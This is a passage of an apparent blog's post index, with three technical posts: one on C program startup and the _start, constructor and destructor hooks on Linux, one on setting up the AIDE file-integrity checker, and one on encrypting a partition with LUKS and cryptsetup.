_start. This function is responsible to load main() by default. What if we change this function with our custom function and never call main().\nI am using below code(nomain.c) and compiling it with a (special flag this time) \u0026ndash; gcc nomain.c -nostartfiles -o nomain.out\n#include\u0026lt;stdio.h\u0026gt; #include\u0026lt;stdlib.h\u0026gt; // For declaration of exit() void _start() { int x = my_fun(); //calling custom main function exit(x); } int my_fun() // our custom main function { printf(\u0026#34;Surprise!!\\n\u0026#34;); return 0; } int main() { printf(\u0026#34;Not the main anymore\u0026#34;); return 0; } On running the binary ./nomain.out we get,\nSurprise!! To understand what just happened, we need to look into the disassembly of this binary. \u0026ndash; objdump -d nomain.out\nnomain.out: file format elf64-x86-64 Disassembly of section .plt: 0000000000001000 \u0026lt;.plt\u0026gt;: 1000:\tff 35 02 30 00 00 pushq 0x3002(%rip) # 4008 \u0026lt;_GLOBAL_OFFSET_TABLE_+0x8\u0026gt; 1006:\tff 25 04 30 00 00 jmpq *0x3004(%rip) # 4010 \u0026lt;_GLOBAL_OFFSET_TABLE_+0x10\u0026gt; 100c:\t0f 1f 40 00 nopl 0x0(%rax) 0000000000001010 \u0026lt;puts@plt\u0026gt;: 1010:\tff 25 02 30 00 00 jmpq *0x3002(%rip) # 4018 \u0026lt;puts@GLIBC_2.2.5\u0026gt; 1016:\t68 00 00 00 00 pushq $0x0 101b:\te9 e0 ff ff ff jmpq 1000 \u0026lt;.plt\u0026gt; 0000000000001020 \u0026lt;printf@plt\u0026gt;: 1020:\tff 25 fa 2f 00 00 jmpq *0x2ffa(%rip) # 4020 \u0026lt;printf@GLIBC_2.2.5\u0026gt; 1026:\t68 01 00 00 00 pushq $0x1 102b:\te9 d0 ff ff ff jmpq 1000 \u0026lt;.plt\u0026gt; 0000000000001030 \u0026lt;exit@plt\u0026gt;: 1030:\tff 25 f2 2f 00 00 jmpq *0x2ff2(%rip) # 4028 \u0026lt;exit@GLIBC_2.2.5\u0026gt; 1036:\t68 02 00 00 00 pushq $0x2 103b:\te9 c0 ff ff ff jmpq 1000 \u0026lt;.plt\u0026gt; Disassembly of section .text: 0000000000001040 \u0026lt;_start\u0026gt;: 1040:\t55 push %rbp 1041:\t48 89 e5 mov %rsp,%rbp 1044:\t48 83 ec 10 sub $0x10,%rsp 1048:\tb8 00 00 00 00 mov $0x0,%eax 104d:\te8 0d 00 00 00 callq 105f \u0026lt;my_fun\u0026gt; 1052:\t89 45 fc mov %eax,-0x4(%rbp) 1055:\t8b 45 fc mov -0x4(%rbp),%eax 1058:\t89 c7 mov %eax,%edi 105a:\te8 d1 ff ff ff callq 1030 \u0026lt;exit@plt\u0026gt; 000000000000105f \u0026lt;my_fun\u0026gt;: 105f:\t55 push %rbp 1060:\t48 89 e5 mov %rsp,%rbp 1063:\t48 8d 3d 96 0f 00 00 lea 0xf96(%rip),%rdi # 2000 \u0026lt;main+0xf8a\u0026gt; 106a:\te8 a1 ff ff ff callq 1010 \u0026lt;puts@plt\u0026gt; 106f:\tb8 00 00 00 00 mov $0x0,%eax 1074:\t5d pop %rbp 1075:\tc3 retq 0000000000001076 \u0026lt;main\u0026gt;: 1076:\t55 push %rbp 1077:\t48 89 e5 mov %rsp,%rbp 107a:\t48 8d 3d 8a 0f 00 00 lea 0xf8a(%rip),%rdi # 200b \u0026lt;main+0xf95\u0026gt; 1081:\tb8 00 00 00 00 mov $0x0,%eax 1086:\te8 95 ff ff ff callq 1020 \u0026lt;printf@plt\u0026gt; 108b:\tb8 00 00 00 00 mov $0x0,%eax 1090:\t5d pop %rbp 1091:\tc3 retq This is pretty small as compared to the disassembly of simple.out. The reason here is clear that we have changed the _start and not implemented any of the fancy functions in it. And this reduces the size of my binary as well.\n$ du nomain.out simple.out 16\tnomain.out 20\tsimple.out What after _start ?? Till now, we have seen that we can pass our values to loader and replace _start with our custom functions\u0026hellip; but this will not start __libc_start_main function.\nWhy do we need __libc_start_main to run??\n__libc_start_main is linked into our code from glibc. In general, it takes care of -\ntakes care of setuid and setguid program security problems. registers init and fini arguments. Calls the main function and exit with the return value of main. (This is something that we did in our custom function - nomain.c) This here is the definition for the __libc_start_main function which is implemented in the libc library.\nAs seen in the disassembly (of simple.out binary)\u0026hellip; we can see that while calling (callq) the __libc_start_main function\u0026hellip; we are passing main, __libc_csu_init and __libc_csu_fini\u0026hellip; along with other things.\n0000000000001040 \u0026lt;_start\u0026gt;: 1040:\tf3 0f 1e fa endbr64 1044:\t31 ed xor %ebp,%ebp 1046:\t49 89 d1 mov %rdx,%r9 1049:\t5e pop %rsi 104a:\t48 89 e2 mov %rsp,%rdx 104d:\t48 83 e4 f0 and $0xfffffffffffffff0,%rsp 1051:\t50 push %rax 1052:\t54 push %rsp 1053:\t4c 8d 05 76 01 00 00 lea 0x176(%rip),%r8 # 11d0 \u0026lt;__libc_csu_fini\u0026gt; 105a:\t48 8d 0d ff 00 00 00 lea 0xff(%rip),%rcx # 1160 \u0026lt;__libc_csu_init\u0026gt; 1061:\t48 8d 3d d1 00 00 00 lea 0xd1(%rip),%rdi # 1139 \u0026lt;main\u0026gt; 1068:\tff 15 72 2f 00 00 callq *0x2f72(%rip) # 3fe0 \u0026lt;__libc_start_main@GLIBC_2.2.5\u0026gt; 106e:\tf4 hlt 106f:\t90 nop What\u0026rsquo;s next??\nNext thing that executes is __libc_csu_init which will call all the initializing functions. This phase runs before the main() function. The sequence which is followed(roughly) by the __libc_csu_init function is:\n__init __gmon_start__ frame_dummy __do_global_ctors_aux C level global constructors init array We\u0026rsquo;ll add our custom c level global constructor and init array function in below code(pre-main.c)\u0026hellip;. and complie it with gcc pre-main.c -o pre-main.out.\n#include \u0026lt;stdio.h\u0026gt; void init(int argc, char **argv, char **envp) { printf(\u0026#34;%s\\n\u0026#34;, __FUNCTION__); } void __attribute__ ((constructor)) constructor() { printf(\u0026#34;%s\\n\u0026#34;, __FUNCTION__); } __attribute__((section(\u0026#34;.init_array\u0026#34;))) typeof(init) *__init = init; int main() { printf(\u0026#34;Hello main\u0026#34;); return 0; } This will give output as below\nconstructor init Hello main After main ?? As we have in the diagram, after main, exit function is called\u0026hellip; which calls multiple functions in the below order:-\nat_exit fini_array constructor. The below code(after-main.c) can be used to demonstrate that.\n#include \u0026lt;stdio.h\u0026gt; void fini() { printf(\u0026#34;%s\\n\u0026#34;, __FUNCTION__); } void __attribute__ ((destructor)) destructor() { printf(\u0026#34;%s\\n\u0026#34;, __FUNCTION__); } __attribute__((section(\u0026#34;.fini_array\u0026#34;))) typeof(fini) *__fini = fini; void do_something_at_end() { printf(\u0026#34;Bye bye\\n\u0026#34;); } int main() { atexit(do_something_at_end); printf(\u0026#34;Hello main\\n\u0026#34;); return 0; } This will return the below output - which confirms the order of execution.\nHello main Bye bye fini destructor Here we can see that the atexit function is called before the printf function but in output the atexit output is after the printf is called. The reason here is that here atexit() is simply registering do_something_at_end function to run at exit. It\u0026rsquo;s not responsible to run it right away.\nThe end. This is pretty much what happens when we run an ELF binary or a C program in linux. In this article, I haven\u0026rsquo;t talked about a lot of other stuff that happens when a program executes\u0026hellip; like setting up the environments variable for the program, how the memory layout is done or what is procedure linkage table(plt), etc\u0026hellip;\nIf you find any information wrongly presented in this article, feel free to correct me. I am still learning this whole stuff and there are a lot of things yet to discover.\n","permalink":"https://ayedaemon.github.io/post/2022/01/debugging-c-code/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHow your x86 program starts up in linux\u003c/p\u003e\n\u003c/blockquote\u003e","title":"Debugging C Code"},{"content":" Host-based intrusion detection system (HIDS) for checking the integrity of files.\nAdvanced Intrusion Detection Environment (AIDE) is a host-based intrusion detection system (HIDS) for checking the integrity of files. It does this by creating a baseline database of files on an initial run, and then checks this database against the system on subsequent runs. File properties that can be checked against include inode, permissions, modification time, file contents, etc……….. more at archwiki📚\nAccording to the definition, AIDE only checks for the integrity of file but not for rootkits and logs for other suspicious activities.\nBut there are other HIDS tools that can do this for you. Like, Splunk and OSSEC.\nAIDE have provided a pretty simple documentation to undertand and get familiar with it.\nHow to install it? # Check what repo will provide you aide tool. yum whatprovides aide # And then install it, if available. yum install aide -y Next step ..?? Let’s check the files unpacked from the aide package we just installed.\nWe found a configuration file — /etc/aide.conf.\n# open the file with vim or your favourite text editor vim /etc/aide.conf # The file looked very huge so I checked its length. wc /etc/aide.conf # OUTPUT: # 312 765 7333 /etc/aide.conf Fortunately they have given a man page for the configurations settings.\nman 5 aide.conf This gives me a good news. There are only 3 types of line in the configuration file.\nThere are the 1️⃣configuration lines which are used to set configuration parameters and define/undefine variables. There are 2️⃣selection lines that are used to indicate which files are added to the database. 3️⃣ macro lines define or undefine variables within the config file. Lines beginning with # are ignored as comments.#️⃣ You can now check the config file and things will make more sense to you. Also you can check the key-value pairs from man page.\nEnough for configuration… How to use it? Go to the man page of aide.\n# from terminal man aide Again a reminder, and I quote.\nAIDE is an intrusion detection system for checking the integrity of files.\nOne thing to notice here is DIAGNOSTICS (Scroll down to bottom on the man page).\nAnother is, that AIDE can be controlled using few basic commands.\nTime for some fun now!! Game-play\nCreate a folder and some files in it. Configure AIDE to add that folder in database. Have fun with the folder and files and check the AIDE logs for reports. Adding my new folder and files to aide.conf\n#-------------- My-Settings --------------- myfilter = sha256 /fun-with-aide myfilter This rule is a regular expression rule and will match the complete path of any file starting from /fun-with-aide, so this will include the files inside this folder.\nNow some simple steps to follow:\n* aide --init * cp /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz * aide --check What if we tinker with the file /fun-with-aide/file1?\nI have changed the content of the file1, due to which the sha256sum has also changed. This should be reported by aide in reports.\nThis generates a report that tells about the changes. I’ll get a count of added files, removed files and changed files, along with the name of those files and some detailed information.\nAIDE can be run manually if desired, but automation is the way nowadays.\nCheck the below provided simple cron job script to automatically check for the changes. For more complex examples check this and this.\n# SOURCE: https://wiki.archlinux.org/index.php/AIDE #!/bin/bash -e # these should be the same as what\u0026#39;s defined in /etc/aide.conf database=/var/lib/aide/aide.db.gz database\\_out=/var/lib/aide/aide.db.new.gz if [ ! -f \u0026#34;$database\u0026#34; ]; then echo \u0026#34;$database not found\u0026#34; \u0026gt;\u0026amp;2 exit 1 fi aide -u || true mv $database $database.back mv $database\\_out $database What about if attacker changed the database??\nWhen I checked the file type of the aide.db.gz\u0026hellip; It came out to be a gzip compressed data, from Unix, max compression file.\nThis makes it very obvious to unzip this compressed file. I prefer using gunzip tool.\nSpecification of the db is also mentioned in the file.\nVisualizing the above in a tabular manner.\nYou can add more filters and integrity checks to test other things as well.\nThis whole db thing gives rise to a question. What if the attacker modifies the db??\nHmmm.. then he wins🤷‍♂️. You have to keep your db secure from attackers. For this, you should keep your database in read-only mode. So that it can be only read and no modifications can be done to this. Also you can keep the DB in a different location like in a centralized server or in a removable media like pendrive. Or you can have it your way.\nYou can read more about Integrity Concepts here for better security guidelines.\nConclusion In the end, let’s understand how AIDE does what it does.\nAIDE takes a “snapshot” of the state of the system, register hashes, modification times, and other data regarding the files defined by the administrator. This “snapshot” is used to build a database that is saved and may be stored on an external device for safekeeping.\nWhen the administrator wants to run an integrity test, the administrator places the previously built database in an accessible place and commands AIDE to compare the database against the real status of the system. Should a change have happened to the computer between the snapshot creation and the test, AIDE will detect it and report it to the administrator. Alternatively, AIDE can be configured to run on a schedule and report changes daily using scheduling technologies such as cron.🔚\n","permalink":"https://ayedaemon.github.io/post/2020/12/advanced-intrusion-detection-environment/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHost-based intrusion detection system (HIDS) for checking the integrity of files.\u003c/p\u003e\n\u003c/blockquote\u003e","title":"Advanced Intrusion Detection Environment"},{"content":" Linux Unified Key Encryption — Disk Encryption\ncryptsetup — manage plain dm-crypt and LUKS encrypted volumes\ncryptsetup \u0026lt;OPTIONS\u0026gt; \u0026lt;action\u0026gt; \u0026lt;action-specific-options\u0026gt; \u0026lt;device\u0026gt; \u0026lt;dmname\u0026gt; An encrypted blockdevice is protected by a key. A key is either:\na passphrase, or a keyfile What the..? Ok.. If you are new to encryption world, then it’s time to get a bit familiar data encryption.\nThere are 2 methods to encrypt your data:\nFilesystem stacked level encryption : Form of disk encryption where individual files or directories are encrypted by the file system itself. read more here Block device level encryption : The entire partition or disk, in which the file system resides, is encrypted. Before things go really technical and scary, let me show you how your data is stored in a harddisk.\nAbove diagram shows how your data is stored in a harddisk.\nYou create files (I am calling it data chunks) and insert your data in it. These files are stored in a very systematic and managed system called File System. Partitions are formatted to carry a file system on it. Harddisks are divided into Partitions. (Wanna know why? — ask Leo!) Now when you know how your data is exactly stored in a harddisk. Let’s see how a Block device level encryption works.\nHere, a new layer is added in the usual thing.\nWe attach a harddisk to our system. Create partitions on it. Encrypt the complete partition (make it password protected) 🔐 Create filesystem (NTFS, EXT4, XFS, etc) on the encrypted partition. Write/save your data chunks. Just Do It now ✔️ Installing required tools I am using a RHEL based OS which uses yum/dnf package managers.\nyum install cryptsetup -y or dnf install -y cryptsetup Creating the partition lsblk - check the device name for the harddisk (sdb)\nfdisk - partitioning tool\nformating with luks cryptsetup -y -v luksFormat /dev/sdb1 - encrypt the partition\nlsblk -f - check the encrypted partition\ncryptsetup -v luksOpen /dev/sdb1 myencrypt - map the encrypted partition to \u0026lsquo;myencrypt\u0026rsquo;.\nlsblk -f - check it\ncreating a file system mkfs.xfs /dev/mapper/myencrypt - create a file system on top of the encrypted partition.\nlsblk -f - Check the layering and filesystem associated.\ncreating a mountpoint mkdir -p /mnt/my_encrypted_backup mount -v /dev/mapper/myencrypt /mnt/my_encrypted_backup/\nIf you face such issues - SELinux lables blah blah blah\nType this on magic terminal — restorecon -vvRF /mnt/my_encrypted_backup/ - This will restore the SELinux context back to defaults for the destination directory.\nChecking luks dumps cryptsetup luksDump /dev/sdb1 Adding new key mkdir /etc/luks-keys/; dd if=/dev/random of=/etc/luks-keys/mybackup\\_key bs=32 count=1 cryptsetup luksAddKey /dev/sdb1 /etc/luks-keys/mybackup\\_key Checking the dumps again\nNow here are 2 slots available.\none with the initial key I entered at the time of setting it up. another, just in the above step. At this particular moment, there are few questions in my mind. You should know them too.\nIf you want to unmount and remove the harddisk. You’ll have to follow the steps: umount /mountpoints/sdb cryptsetup luksClose myencrypt If you want to open the luks partition with keyfile instead of the passphrase. cryptsetup -v luksOpen /dev/sdb1 myencrypt --key-file=/etc/luks-keys/mybackup\\_key What if someone changes the content of the keyfile? Creating a new key\nAdd the key to the slots\nUse key\nSo the content inside the keyfile do matter; You can’t change it and expect things to work just fine for you.\nTime for some Automation Get the UUID of the encrypted partition\nAnd make the below entry in /etc/crypttab file. (Check the UUID for your device - Don\u0026rsquo;t copy mine!!)\nmyencrypt UUID=48a20857-6f26-4352-89d5-e778f2d98950 /etc/luks-keys/mybackup\\_key luks The above line is a combination of 4 fields:\nname of the mapped device. uuid of the encrypted partition keyfile to unlock the partiotion type of encryption used — luks And then make below entry in /etc/fstab file.\n/dev/mapper/myencrypt /mountpoints/sdb xfs defaults 0 0 Want to learn more about crypttab and fstab\nLast step to verify if the above steps worked fine or not.\nRemount and verify (using mount command with \u0026lsquo;a\u0026rsquo; and \u0026lsquo;v\u0026rsquo; flags for clarity) Reboot the system and check if everything works after reboot. (Trust me, things betray sometimes after reboot) Want to read more about dm-crypt or device encryption?\n","permalink":"https://ayedaemon.github.io/post/2020/12/luks-disk-encryption/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLinux Unified Key Encryption — Disk Encryption\u003c/p\u003e\n\u003c/blockquote\u003e","title":"LUKS Disk Encryption"}]